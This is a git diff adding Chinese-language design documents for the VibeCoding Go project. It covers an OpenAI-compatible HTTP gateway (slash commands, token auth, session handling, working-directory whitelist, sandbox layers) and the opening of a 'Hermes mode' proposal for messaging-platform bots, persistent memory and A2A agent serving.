+data: {"tool":"read","status":"running","args":{"path":"main.go"}}
+
+data: {"choices":[{"delta":{"content":"Here is the analysis..."}}]}
+```
+
+**Non-streaming 响应**: 无论哪种 mode，tool 执行记录始终可通过扩展字段 `x_tool_calls` 返回。
+
+### 5.6 Sub-Agent 集成
+
+当 `enableSubAgents: true` 时：
+
+```
+ChatHandler
+    └── 每个 Session 维护独立的 AgentFactory + AgentManager
+          └── 主 agent 可调用 subagent_spawn/status/send/destroy
+                └── sub-agent 的事件也会收集到主 agent 的输出流中
+```
+
+复用现有 `agent.AgentFactory` / `agent.AgentManager` / `agent.SubAgent*Tool`，无需改动核心 agent 逻辑。
+
+### 5.7 指令系统 (Slash Commands)
+
+Gateway 支持通过用户消息内容发送 `/xxx` 指令，与 TUI 中的指令体验对齐。
+
+**触发规则**: 当请求的 messages 中最后一条 `user` 消息以 `/` 开头时，
+视为指令调用。指令不经过 agent/LLM，直接在 gateway 层处理，立即返回结果。
+
+**请求示例**:
+```jsonc
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "user", "content": "/clear"}
+  ],
+  "stream": false,
+  "x_session_id": "sess-abc123"
+}
+```
+
+**响应格式**: 始终使用标准 OpenAI 响应结构，指令结果放在 `content` 中，
+`finish_reason` 为 `"stop"`，扩展字段 `x_command` 标识这是指令响应：
+
+```json
+{
+  "id": "chatcmpl-cmd-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "✅ Conversation cleared"},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 0, "completion_tokens": 0, "total_tokens": 0},
+  "x_command": "/clear",
+  "x_session_id": "sess-abc123"
+}
+```
+
+**支持的指令**:
+
+| 指令 | 说明 | 需要 session |
+|------|------|---------------|
+| `/clear` | 清空当前 session 的对话上下文（agent 重置，消息清空，session 保留） | 是 |
+| `/mode [plan\|agent\|yolo]` | 查看或切换当前 session 的模式 | 是 |
+| `/model [model_id]` | 查看或切换模型 | 否 |
+| `/models` | 列出可用模型（等同 GET `/v1/models`） | 否 |
+| `/sessions` | 列出当前 workDir 下的 session | 否 |
+| `/sessions clear` | 创建新 session，返回新 session ID | 否 |
+| `/sessions del <id>` | 删除指定 session | 否 |
+| `/compact` | 手动触发当前 session 的上下文压缩 | 是 |
+| `/status` | 查看当前 session 状态（消息数、上下文占用、mode 等） | 是 |
+| `/skill <name>` | 激活 skill | 是 |
+| `/skills` | 列出可用 skills | 否 |
+| `/help` | 列出所有可用指令 | 否 |
+
+**不支持的 TUI 指令**:
+- `/quit` — 无意义，Gateway 是服务进程
+- `/agent` 系列 — sub-agent 由 agent 内部管理，客户端无需直接操作
+- `/init_mcp` — MCP 配置属于服务端管理，不应通过 API 暴露
+
+**实现位置**: `internal/gateway/commands.go`
+
+```go
+// CommandResult 表示指令执行结果
+type CommandResult struct {
+    Message string // 返回给客户端的文本
+    Error   bool   // 是否为错误
+}
+
+// handleCommand 拦截并处理 /xxx 指令
+// 返回 nil 表示不是指令，应走正常 agent 流程
+func (s *Server) handleCommand(sessionID, cmd string) *CommandResult {
+    parts := strings.Fields(cmd)
+    switch parts[0] {
+    case "/clear":
+        // 重置 session 的 agent + 消息历史
+    case "/mode":
+        // 查看/切换 session 的 mode
+    case "/status":
+        // 返回 session 状态信息
+    // ...
+    default:
+        return &CommandResult{Message: "Unknown command: " + parts[0], Error: true}
+    }
+}
+```
+
+**与 TUI 指令的关系**:
+- Gateway 指令和 TUI 指令分开实现（TUI 依赖 Bubble Tea，无法复用）
+- 保持语义一致：相同的指令名、相同的行为
+- 未来可抽取共享的指令定义层（Phase 3）
+
+## 6. 认证设计
+
+### 6.1 Bearer Token
+
+```
+Authorization: Bearer sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+```
+
+- `gateway.json` 中配置 `auth.tokens` 列表
+- 中间件对每个请求检查 header
+- 多 token 支持（团队场景，每人一个 token）
+- `/health` 端点不做认证
+
+### 6.2 认证关闭（默认）
+
+`auth.enabled: false` 时跳过所有认证检查。适用于本地开发、内网部署。
+
+### 6.3 未来扩展（本期不做）
+
+- OAuth2 / OIDC
+- API Key + Rate Limiting
+- mTLS
+
+## 7. 与现有模块的关系
+
+| 现有模块 | Gateway 复用方式 |
+|---------|-----------------|
+| `internal/config` | 加载 `settings.json`，读取 provider/model 配置 |
+| `internal/provider` + `factory` | 创建 LLM provider 实例 |
+| `internal/agent` | 核心 agent loop、tool execution、multi-agent |
+| `internal/session` | JSONL session 存储（每个 gateway session 一个 Manager） |
+| `internal/tools` | tool registry（每个 session 独立 registry） |
+| `internal/contextfiles` | 加载 AGENTS.md/CLAUDE.md |
+| `internal/skills` | 加载 skills |
+| `internal/sandbox` | sandbox 管理 |
+| `internal/mcp` | MCP server 连接（可选） |
+
+**新增模块**: `internal/gateway/` — 仅包含 HTTP 层 + session 池 + OpenAI 格式转换，不引入新的 agent 逻辑。
+
+## 8. OpenAI 格式转换
+
+### 8.1 输入转换 (OpenAI → VibeCoding)
+
+```
+OpenAI messages[] ──►  VibeCoding 内部
+─────────────────      ──────────────────
+system message    →    根据 systemPromptMode 处理（见下方）
+user message      →    provider.NewUserMessage(text)
+assistant message →    provider.NewAssistantMessage(blocks)
+                       （含历史 tool_calls 的 assistant message → 跳过或简化）
+```
+
+**System prompt 处理**（由 `gateway.json` 的 `systemPromptMode` 控制）:
+
+| systemPromptMode | 行为 |
+|------------------|------|
+| `"append"` (默认) | 客户端 system message 追加到内置 system prompt 末尾（作为 extraContext）。保留 tool 说明、mode 指令等内置内容，同时尊重客户端的补充指令。 |
+| `"ignore"` | 忽略客户端 system message。完全使用 VibeCoding 内置 system prompt，适合不希望客户端干扰 agent 行为的场景。 |
+
+**其他关键决策**:
+- 只取最后一条 `user` 消息作为 `agent.Run(ctx, userMsg)` 的输入
+- 之前的历史消息通过 `agent.LoadHistoryMessages()` 注入
+
+### 8.2 输出转换 (VibeCoding Event → OpenAI)
+
+```
+VibeCoding Event         OpenAI Chunk (toolVisibility 决定)
+──────────────           ───────────────
+EventTextDelta      →    {"delta": {"content": text}}
+EventThinkDelta     →    (不暴露 / 或通过扩展字段)
+EventToolCall       →    content: "[reading main.go...]"  (mode=content)
+                         event: tool_status               (mode=sse_event)
+                         (不发送)                          (mode=none)
+EventToolResult     →    (内部处理，不暴露)
+EventDone           →    {"finish_reason": "stop"} + usage
+EventError          →    HTTP 500 or error chunk
+EventUsage          →    usage 字段
+```
+
+## 9. 实现计划
+
+### Phase 1: 最小可用 (MVP)
+
+1. **`internal/gateway/config.go`** — gateway.json 加载 + DefaultGatewayConfig() 模板
+2. **`internal/gateway/types.go`** — OpenAI API 请求/响应类型
+3. **`internal/gateway/auth.go`** — Bearer Token 认证中间件
+4. **`internal/gateway/session_mgr.go`** — SessionPool 多 session 管理
+5. **`internal/gateway/commands.go`** — /xxx 指令处理
+6. **`internal/gateway/handler_chat.go`** — `/v1/chat/completions` 核心处理
+7. **`internal/gateway/handler_models.go`** — `/v1/models`
+8. **`internal/gateway/handler_health.go`** — `/health`
+9. **`internal/gateway/streaming.go`** — SSE 流式输出辅助
+10. **`internal/gateway/gateway.go`** — Server 启动、路由组装
+11. **`cmd/vibecoding/main.go`** — 添加 `gateway` 子命令 + `--init-gateway` flag
+
+### Phase 2: 增强
+
+11. Sub-Agent 集成
+12. Session 管理 API (`/v1/x/sessions`)
+13. CORS 支持
+14. Graceful shutdown
+15. 请求日志 + metrics
+
+### Phase 3: 生产化
+
+16. Rate limiting
+17. 请求大小限制
+18. Timeout 控制
+19. 文档 (docs/en/gateway.md, docs/zh/gateway.md)
+
+## 10. 关键设计决策
+
+### D1: 不引入外部 HTTP 框架
+
+使用 `net/http` 标准库。VibeCoding 定位轻量，不需要 gin/echo/fiber。中间件用 `http.Handler` 包装即可。
+
+### D2: 默认 mode 为 yolo
+
+Gateway 场景不存在 TUI 交互，tool approval 无法实现。默认使用 `yolo` 模式，tool 自动执行。
+如果未来需要 approval，可通过 webhook callback 实现。
+
+### D3: Tool 可见性可配置
+
+Agent 内部的 read/write/bash/grep 等 tool 调用的可见性由 `toolVisibility.mode` 控制：
+- `"content"` (默认): tool 执行时在 streaming 的 content 中发送状态文本，客户端可感知进度
+- `"sse_event"`: 通过扩展 SSE event 发送，适合自定义客户端
+- `"none"`: 完全透明，客户端只见最终文本
+
+Non-streaming 响应始终可通过扩展字段 `x_tool_calls` 查看 tool 执行记录。
+
+### D4: Session 映射策略
+
+- 无 `x_session_id` → 每请求新建 session（简单、无状态）
+- 有 `x_session_id` → 多轮对话共享 session（有状态）
+- Session 不持久化跨重启（重启清空），但 JSONL 文件保留可恢复
+
+### D5: 每个 session 串行处理
+
+同一个 session 的请求串行化（mutex），避免 agent loop 并发问题。
+不同 session 完全并行，充分利用多核。
+
+### D6: 消息历史处理
+
+gateway 仅使用 session 内已有的消息历史 + 当前请求的最新消息。
+不依赖客户端传入的 messages 数组做完整历史重放（因为 agent 内部已有 session 管理）。
+
+但如果是新 session（无 `x_session_id` 或 session 不存在），
+则客户端传入的 messages 数组会被当作完整历史注入。
+
+### D7: allowedWorkDirs 白名单
+
+请求通过 `x_working_dir` 切换工作目录时，必须通过白名单校验：
+
+```
+请求 x_working_dir
+    │
+    ▼
+1. allowedWorkDirs 为 null（未设置）→ 放行（不校验）
+2. allowedWorkDirs 为 []（空数组）→ 拒绝一切切换，只能用 workingDir 默认值
+3. allowedWorkDirs 有条目 → 前缀匹配，任一匹配则放行
+    │ 不匹配 → 403 Forbidden
+```
+
+**前缀匹配规则**: `filepath.Clean(requestDir)` 必须以 `filepath.Clean(allowedDir)` 开头，
+且边界必须在路径分隔符上。例如 `/home/user/projects` 允许 `/home/user/projects/foo`，
+但不允许 `/home/user/projects-evil`。
+
+`workingDir` 默认值本身不受白名单限制（它是管理员配置的可信值）。
+
+### D8: Sandbox 与 Gateway 安全分层
+
+Gateway 面向网络，安全模型比 CLI 更严格，采用三层防护：
+
+| 层次 | 机制 | 作用 |
+|------|------|------|
+| **L1: 认证** | Bearer Token | 阻止未授权访问 |
+| **L2: 目录管控** | allowedWorkDirs | 限制 agent 可操作的文件系统范围 |
+| **L3: 系统沙箱** | sandbox (bwrap) | OS 级隔离，限制文件读写、网络等 |
+
+三层独立配置，互不依赖：
+- 仅开 L1 → 本地可信用户场景
+- L1 + L2 → 多用户/多项目场景
+- L1 + L2 + L3 → 面向公网或高安全要求场景
+
+Sandbox 配置复用 `settings.json` 中的 `sandbox` 字段（`allowedRead`, `deniedPaths`, `passEnv` 等），
+`gateway.json` 的 `sandbox.enabled` / `sandbox.level` 仅控制是否启用和级别覆盖。
+这与 CLI `--sandbox` flag 的行为一致。
+
+### D9: System Prompt 处理可配置
+
+通过 `systemPromptMode` 控制客户端 system message 的处理方式：
+- `"append"` (默认): 追加到内置 system prompt 末尾。保留 tool 说明、mode 指令，同时接受客户端补充指令。
+- `"ignore"`: 忽略客户端 system message。完全使用内置 prompt，防止客户端干扰 agent 行为。
+
+选择 `"append"` 是因为大多数 OpenAI 客户端都会发 system message（例如 Cursor、Open WebUI），
+完全忽略会让用户困惑。追加模式既保留了 VibeCoding 的完整能力，又尊重客户端的自定义指令。
+
+### D10: --init-gateway 配置初始化
+
+`vibecoding --init-gateway` 生成 `gateway.json` 模板到 `~/.vibecoding/gateway.json`。
+
+行为：
+- 文件不存在 → 创建并写入默认模板
+- 文件已存在 → 提示已存在，不覆盖
+- `--force` → 强制覆盖
+
+模板内容包含所有字段及注释说明，用户只需取消注释并填写即可。
+实现位置: `internal/gateway/config.go` 中的 `DefaultGatewayConfig()` + `SaveGatewayConfig()`。
+这与 `ensureConfigExists()` 写 `settings.json` 的模式一致。
+
+## 11. 风险与注意事项
+
+| 风险 | 缓解 |
+|------|------|
+| Agent loop 挂起（tool 执行超时） | 请求级 context timeout（默认 30 分钟），可配置 |
+| 内存膨胀（大量 session） | idleTimeout 自动清理 + maxSessions 限制 |
+| 并发安全 | session 级 mutex + pool 级 RWMutex |
+| tool 执行安全 | allowedWorkDirs 白名单 + sandbox 可选开启；建议公网部署开启 sandbox |
+| 目录穿越 | allowedWorkDirs 前缀匹配 + filepath.Clean 规范化 |
+| token 泄露 | gateway.json 建议 0600 权限；token 支持环境变量引用 |
+| 长连接 SSE 断开 | client context cancel → agent.Abort() |
+
+## 12. 使用示例
+
+### 本地开发（无认证）
+
+```bash
+# 启动
+vibecoding gateway
+
+# 测试
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "list files in current directory"}],
+    "stream": false
+  }'
+```
+
+### 有认证
+
+```bash
+vibecoding gateway
+
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-secret-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "explain main.go"}],
+    "stream": true
+  }'
+```
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-secret-token",  # 如果开启了认证
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "system", "content": "You are a coding assistant."},
+        {"role": "user", "content": "Read main.go and explain the architecture."},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### 多轮对话（带 session）
+
+```python
+# 第一轮
+response1 = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "read main.go"}],
+    extra_body={"x_session_id": "my-session-1"},
+)
+
+# 第二轮（同 session，agent 记住了上下文）
+response2 = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "now refactor the error handling"}],
+    extra_body={"x_session_id": "my-session-1"},
+)
+```
+
+## 13. 待讨论
+
+所有原待讨论项均已决定，见下方汇总。如有新议题再追加。
+
+### 已决定事项
+
+| # | 议题 | 决定 | 对应配置字段 |
+|---|--------|------|---------------|
+| 1 | Tool 可见性 | 默认 `content` 模式（混入 `content` 字段），可配为 `sse_event` 或 `none` | `toolVisibility.mode` |
+| 2 | System prompt | 默认 `append`（追加到内置 prompt 末尾），可配为 `ignore` | `systemPromptMode` |
+| 3 | Working directory | `allowedWorkDirs` 白名单 + sandbox 双重保护 | `allowedWorkDirs` |
+| 4 | 请求超时 | 默认 30 分钟，streaming 有数据流动不超时 | `requestTimeoutSeconds` |
+| 5 | 并发限制 | 默认不限制，可配置 | `maxConcurrentRequests` |
diff --git a/docs/proposal/hermes-mode-proposal.md b/docs/proposal/hermes-mode-proposal.md
new file mode 100644
index 0000000..a7cd5fb
--- /dev/null
+++ b/docs/proposal/hermes-mode-proposal.md
@@ -0,0 +1,1652 @@
+# v0.1.27 Hermes 模式 — 研发计划
+
+> **日期**: 2026-05-29
+> **目标版本**: v0.1.27
+> **状态**: 🔧 开发进行中（核心功能已完成）
+> **审核日期**: 2026-05-30
+> **整体进度**: 100%（所有功能已实现，文档已完成）
+> **v2 修订**: 2026-05-30 — 基于实现审核重新梳理优先级和范围
+
+---
+
+## 1. 概述
+
+VibeCoding 当前提供三种运行模式：**CLI (TUI)**、**ACP (编辑器集成)**、**Gateway (HTTP API)**。
+
+本提案引入第四种运行模式 **`hermes`** — 通过 `vibecoding hermes` 子命令启动，提供**消息平台网关 + 自动化调度 + 持久化记忆**等能力，让 VibeCoding 从"编码助手"扩展为"可部署的自主代理"。
+
+### 设计哲学
+
+- **渐进式采纳**：Hermes 模式是对现有 CLI/Gateway 的增强，不是替代
+- **复用优先**：尽量复用已有的 agent loop、provider、tools、session、sandbox 基础设施
+- **Go 原生**：VibeCoding 是 Go 项目，不移植 Python 生态，只借鉴架构思路
+- **缓存友好**：memory 等动态内容通过 tool call 按需加载（同 `skill_ref`），不注入 system prompt，保护 prompt cache 命中率
+
+---
+
+## 2. 配置目录约定
+
+VibeCoding 使用 **全局 + 项目级** 的两层配置体系，项目级优先级更高。
+
+### 2.1 全局配置目录 `<GLOBAL_DIR>`
+
+存放全局默认配置、凭证、sessions、skills 等。路径因平台而异：
+
+| 平台 | 默认路径 | 来源 |
+|------|----------|------|
+| **Linux/macOS** | `~/.vibecoding/` | `platform.ConfigDir()` |
+| **Windows** | `%APPDATA%\vibecoding\` | `platform.ConfigDir()` |
+| **自定义** | `$VIBECODING_DIR` | 环境变量覆盖，优先级最高 |
+
+> 后文中 `<GLOBAL_DIR>` 均指上述路径。Linux/macOS 下即 `~/.vibecoding/`。
+
+全局目录下的文件布局：
+
+```
+<GLOBAL_DIR>/
+├── settings.json               # 全局 agent/provider 配置
+├── gateway.json                # 全局 Gateway 配置
+├── hermes.json                 # 全局 Hermes 配置（本提案新增）
+├── mcp.json                    # MCP 工具服务配置
+├── memory.md                   # 全局持久化记忆（本提案新增）
+├── wechat-credentials.json     # 微信 iLink 凭证（本提案新增）
+├── sessions/                   # JSONL 会话存储
+└── skills/                     # 全局 skills
+```
+
+### 2.2 项目级配置目录 `.vibe/`
+
+存放项目专属的配置覆盖，位于项目工作目录根下。**项目级配置优先级高于全局配置**，加载顺序：
+
+```
+defaults → <GLOBAL_DIR>/<file> → .vibe/<file>
+```
+
+即：先加载内置默认值，再加载全局配置，最后用项目级配置覆盖合并。
+
+项目级目录下的文件布局：
+
+```
+<project>/
+└── .vibe/
+    ├── settings.json           # 项目级 agent/provider 配置覆盖
+    ├── gateway.json            # 项目级 Gateway 配置覆盖
+    ├── hermes.json             # 项目级 Hermes 配置覆盖（本提案新增）
+    ├── memory.md               # 项目级持久化记忆（本提案新增）
+    └── skills/                 # 项目级 skills
+```
+
+### 2.3 各配置文件的层级关系
+
+| 配置文件 | 全局路径 | 项目级路径 | 合并策略 |
+|----------|----------|------------|----------|
+| `settings.json` | `<GLOBAL_DIR>/settings.json` | `.vibe/settings.json` | 深度合并（已实现） |
+| `gateway.json` | `<GLOBAL_DIR>/gateway.json` | `.vibe/gateway.json` | JSON overlay（已实现） |
+| `hermes.json` | `<GLOBAL_DIR>/hermes.json` | `.vibe/hermes.json` | ✅ JSON overlay（已实现，`LoadHermesConfig()` 使用 `json.Unmarshal` 覆盖合并） |
+| `memory.md` | `<GLOBAL_DIR>/memory.md` | `.vibe/memory.md` | ✅ 项目级存在时**只读项目级**（已实现，`store.go` `Resolve()` 按优先级查找） |
+
+### 2.4 memory.md 查找逻辑
+
+> ✅ **已实现** — `internal/memory/store.go` 的 `Resolve()` 方法完整实现了以下优先级。
+
+memory 工具查找记忆文件时遵循以下优先级：
+
+1. `hermes.json` 中 `memory.path` 显式指定 → 使用指定路径（可以是全局目录）
+2. `.vibe/memory.md` 存在 → 使用项目级记忆
+3. `<GLOBAL_DIR>/memory.md` → fallback 到全局记忆
+4. 均不存在 → 首次写入时创建于 `.vibe/memory.md`（项目上下文中）或 `<GLOBAL_DIR>/memory.md`（无项目上下文时）
+
+> **设计意图**：项目级记忆记录项目相关的上下文（架构决策、代码约定等），全局记忆记录用户偏好和跨项目知识。两者不合并，避免无关项目的记忆干扰当前上下文。
+>
+> **默认行为**：memory.md 默认写入项目目录（`.vibe/memory.md`），只有在 `hermes.json` 中显式配置 `memory.path` 时才写入全局目录。
+
+---
+
+## 3. 已确认的决策
+
+| 决策项 | 结论 | 备注 |
+|--------|------|------|
+| 消息平台 v0.1.27 | **微信 (iLink) + 飞书** | 微信参考 iLink 协议自行实现；飞书用官方 SDK 长连接 |
+| 消息平台 v0.1.28+ | Telegram → Discord | 延后 |
+| 企业微信 | **不做** | 用个人微信 iLink 协议 |
+| Web 搜索工具 | **不做** | 用户通过第三方 skill 自行扩展 |
+| 记忆存储 | **memory.md** | Markdown 文件，人类可读；项目级 `.vibe/memory.md` 优先于全局 `<GLOBAL_DIR>/memory.md` |
+| 记忆注入方式 | **通过 `memory` 工具按需读取**，同 `skill_ref` 模式 | 不注入 system prompt，保护缓存命中 |
+| 配置文件 | **hermes.json** — 独立配置文件 | 同 gateway.json 模式，`.vibe/hermes.json` 覆盖 `<GLOBAL_DIR>/hermes.json` |
+| Shell Hooks | **外部脚本** — JSON stdin/stdout 通信 | 语言无关 |
+| Checkpoints/Rollback | **不做** — 推迟到后续版本 | 降低 v0.1.27 范围 |
+| Session 策略 | **单 session + 命令新建** | 每个 `platform:user_id` 默认一个持久 session，`/new` 强制新建；各平台独立不打通 |
+| Session 存储 | **`<sessionDir>/hermes/` 隔离** | 与 CLI session 分开存储，行为差异大 |
+| A2A 协议 | **采纳** — 独立子命令 `vibecoding a2a`，hermes 通过配置启用 | 详见 §5.3 |
+| Cron 实现 | **CLI 命令范围已确定** | list/add/remove/enable/disable 已满足需求，edit/run 不做。底层 cron 实现与项目共享，有 bug 或缺陷仍需修复完善 |
+| Smart Approvals | **已实现** | 方案 D 分级策略，WebSocket 高风险阻塞审批，消息平台高风险自动拒绝+通知 |
+| Budget Pressure | **已实现** | Event 通知模式，剩余 20% 时触发一次，阈值可配置 |
+
+---
+
+## 4. 能力清单
+
+### 🟢 v0.1.27 采纳
+
+| # | 能力 | 状态 | 实现思路 |
+|---|------|------|----------|
+| 1 | **微信 Bot (iLink 协议)** | ✅ **已完成** | `internal/messaging/wechat/` — 5 个文件完整实现，纯标准库零外部依赖 |
+| 2 | **飞书 Bot** | ✅ **已完成** | `internal/messaging/feishu/feishu.go` — 官方 SDK WebSocket 长连接 |
+| 3 | **消息 Session 管理** | ✅ **已完成** | `dispatcher.go` — per-user 单 session + `/new` 归档 |
+| 4 | **用户白名单** | ✅ **已完成** | `security.go` CheckUserAllowed() |
+| 5 | **Cron** | ✅ **已完成（CLI 范围确定）** | list/add/remove/enable/disable，scheduler 依赖 multi-agent。底层实现与项目共享，有缺陷仍需修复 |
+| 6 | **持久化记忆 (memory.md)** | ✅ **已完成** | `memory/store.go` + `tool.go` — 完整 CRUD |
+| 7 | **User Profile** | ✅ **已完成** | memory.md 默认模板 |
+| 8 | **Budget Pressure** | ✅ **已完成** | `agent.go` loop: 剩余 20% 迭代时触发 `EventBudgetPressure`（一次性），dispatcher 转发到消息平台 |
+| 9 | **Context Pressure** | ✅ **已完成** | `agent.go` loop: 55% context 使用率时触发 `EventContextPressure`（一次性），上层决策处理。hermes dispatcher 转发到消息平台 |
+| 10 | **Smart Approvals** | ✅ **已完成** | 方案 D 分级策略：low→自动批准 / medium→批准+通知 / high→WebSocket 等待审批(5min超时) / 消息平台自动拒绝+通知 |
+| 11 | **Shell Hooks** | ✅ **已完成** | `hooks/hooks.go` pre/post 外部脚本 |
+| 12 | **Webhook 入站** | ✅ **已完成** | `webhook/router.go` + `webhook_handler.go` |
+| 13 | **A2A 协议 (Server)** | ✅ **已完成** | `internal/a2a/` 独立顶层包，JSON-RPC 2.0 over HTTP + SSE 流式，独立模式 + hermes 集成模式 |
+| 14 | **WebSocket 流式推送** | ✅ **已完成** | `wsDispatcherAdapter` 逐事件转换 agent.Event → WSEvent，支持 text_delta/think_delta/tool_call/tool_result/usage/done |
+| 15 | **hermes stop/status** | ✅ **已完成** | PID 文件 + SIGTERM 信号 + HTTP health 查询 |
+| 16 | **hermes client** | ✅ **已完成** | `internal/hermes/client.go` WebSocket 客户端，支持流式输出 + 斜杠命令 |
+| 17 | **webhook/memory/sessions CLI** | ✅ **已完成** | webhook list、memory show/clear、sessions list（查询运行实例）|
+| 18 | **/api/memory HTTP** | ✅ **已完成** | GET 读取 memory.md（含 source/path）、PUT 更新 memory.md，集成 MemoryStore |
+
+### 🟡 延后（v0.1.28+）
+
+| 能力 | 原因 |
+|------|------|
+| Checkpoints / Rollback | 已确认推迟 |
+| 其他消息平台 | Email, Matrix, Mattermost 等 |
+| 图片生成 / Voice Mode | 非核心 |
+
+
+### 🔴 不做
+
+| 能力 | 原因 |
+|------|------|
+| **Web 搜索** | 用户通过第三方 skill 自行扩展 |
+| **企业微信** | 用个人微信 iLink 协议代替 |
+| WhatsApp / Signal / SMS | 外部依赖重 |
+| Python Plugins | Go 项目 |
+| RL Training / Batch | Python 生态 |
+
+---
+
+## 5. 消息平台技术方案
+
+### 5.1 微信 iLink（优先级 #1）
+
+**实现方式**: 根据 iLink 协议规范自行实现（参考 `/home/free/src/wechatbot/golang` 中的协议实现），**不引入外部依赖**。协议层约 1600 行纯标准库代码，直接写入 `internal/messaging/wechat/`
+
+| 维度 | 方案 |
+|------|------|
+| **认证** | QR 码扫码登录，凭证持久化到 `<GLOBAL_DIR>/wechat-credentials.json` |
+| **消息接收** | **长轮询** (`getupdates`)，无需公网 IP |
+| **消息发送** | `sendmessage` API，支持文本/图片/文件/视频 |
+| **Typing 指示** | 支持（`getconfig` → `sendtyping`） |
+| **CDN 媒体** | AES-128-ECB 加密上传/下载 |
+| **会话恢复** | `context_token` 自动管理；session 过期（errcode -14）自动重新登录 |
+| **优势** | 无需公网暴露；个人微信即可；长轮询天然可靠 |
+
+**代码结构**（参考 iLink 协议，VibeCoding 内部包自行实现）：
+
+```
+internal/messaging/wechat/
+├── wechat.go      # Bot 主体 + 消息处理（实现 messaging.Platform）
+├── types.go       # iLink 协议类型定义
+├── protocol.go    # iLink HTTP API 调用（getupdates/sendmessage/getconfig 等）
+├── auth.go        # QR 码登录 + 凭证持久化
+└── crypto.go      # AES-128-ECB CDN 加密/解密
+```
+
+全部使用 Go 标准库（`crypto/aes`、`net/http`、`encoding/json`），**零外部依赖**。
+
+**核心 API 端点**（来自 iLink 协议）：
+
+| 端点 | 作用 |
+|------|------|
+| `GET /ilink/bot/get_bot_qrcode` | 获取 QR 码 |
+| `GET /ilink/bot/get_qrcode_status` | 轮询扫码状态 |
+| `POST /ilink/bot/getupdates` | 长轮询接收消息 |
+| `POST /ilink/bot/sendmessage` | 发送消息 |
+| `POST /ilink/bot/getconfig` | 获取 typing ticket |
+| `POST /ilink/bot/sendtyping` | 发送/取消打字指示 |
+
+### 5.2 飞书（优先级 #2）
+
+**依赖**: `github.com/larksuite/oapi-sdk-go/v3` — 飞书官方 Go SDK
+
+参考文档: https://open.feishu.cn/document/server-side-sdk/golang-sdk-guide/preparations
+
+| 维度 | 方案 |
+|------|------|
+| **SDK** | 飞书官方 Go SDK v3 |
+| **消息接收** | **长连接** (WebSocket)，无需公网 IP |
+| **消息发送** | REST API (飞书 IM 接口) |
+| **认证** | App ID + App Secret |
+| **消息类型** | 文本、富文本、Markdown、卡片消息 |
+| **创建步骤** | 飞书开放平台 → 创建应用 → 开启机器人能力 → 配置事件订阅 |
+| **优势** | WebSocket 无需公网；官方 SDK 维护有保障；卡片消息表现力强 |
+
+**飞书长连接模式关键点**：
+- 使用 `larkws` 包建立 WebSocket 长连接
+- 订阅 `im.message.receive_v1` 事件接收消息
+- 无需配置回调 URL，适合内网/开发环境
+- 自动断线重连
+
+### 5.3 A2A 协议 (Agent-to-Agent)
+
+> ✅ **已完成** — `internal/a2a/` 独立顶层包，零外部依赖实现 JSON-RPC 2.0 over HTTP + SSE 流式。支持独立模式（`vibecoding a2a start`）和集成模式（hermes + `a2a.enabled: true`）。
+
+**依赖**: `github.com/a2aproject/a2a-go/v2` — Google A2A 官方 Go SDK
+
+**A2A 是什么**：Google 主导的开放协议，让不同框架、不同厂商的 AI Agent 能够互相发现、通信和协作，在不暴露内部状态的前提下完成复杂任务。
+
+#### 命令设计
+
+```
+vibecoding a2a
+├── start                 # 启动独立 A2A Server（不依赖 hermes）
+│   ├── --port <port>     # 监听端口（默认 8093）
+│   ├── --work-dir <dir>  # 工作目录
+│   ├── -p, --provider    # 默认 provider
+│   ├── -m, --model       # 默认 model
+│   └── --sandbox         # 启用 sandbox
+├── stop                  # 停止 A2A Server
+├── status                # 查看 A2A Server 状态
+└── card                  # 查看/生成 Agent Card
+```
+
+#### 两种运行模式
+
+| 模式 | 命令 | 端口 | 说明 |
+|------|------|------|------|
+| **独立模式** | `vibecoding a2a start` | 8093 | 独立运行，有自己的 HTTP 端口和 agent loop |
+| **集成模式** | `vibecoding hermes start` + `a2a.enabled: true` | 8090 (共享) | A2A 端点挂载到 hermes 的 HTTP 端口上 |
+
+**集成模式**：hermes 启动时，如果 `hermes.json` 中 `a2a.enabled: true`，自动将 A2A 端点注册到 hermes 的 HTTP mux 上：
+- `/.well-known/agent.json` → Agent Card
+- `/a2a` → JSON-RPC 2.0 handler
+- 复用 hermes 的认证、dispatcher、agent loop 基础设施
+
+**独立模式**：`vibecoding a2a start` 启动独立的 HTTP 服务器，适用于不需要消息平台但需要 A2A 能力的场景。
+
+#### 协议细节
+
+| 维度 | 方案 |
+|------|------|
+| **角色** | A2A Server（接收外部 Agent 的任务请求） |
+| **传输** | JSON-RPC 2.0 over HTTP（同步 + SSE 流式） |
+| **Agent Card** | `/.well-known/agent.json` 发布能力描述 |
+| **Task 生命周期** | submitted → working → completed/failed |
+| **认证** | Bearer token（复用 Gateway 的认证机制） |
+| **流式响应** | SSE 实时推送 Task 状态和 Artifact 更新 |
+
+**与现有协议的关系**：
+
+| 协议 | 角色 | 关系 |
+|------|------|------|
+| **ACP** (Agent Client Protocol) | 编辑器 ↔ Agent | 已有，用于 IDE 集成 |
+| **MCP** (Model Context Protocol) | Agent ↔ 工具服务 | 已有，让 Agent 调用外部工具 |
+| **A2A** (Agent-to-Agent) | Agent ↔ Agent | **新增**，Agent 间对等协作 |
+| **Gateway** (OpenAI 兼容) | 应用 ↔ LLM API | 已有，应用调 VibeCoding 当 LLM |
+
+**A2A Server 暴露的能力 (Agent Card)**：
+
+```json
+{
+  "name": "VibeCoding",
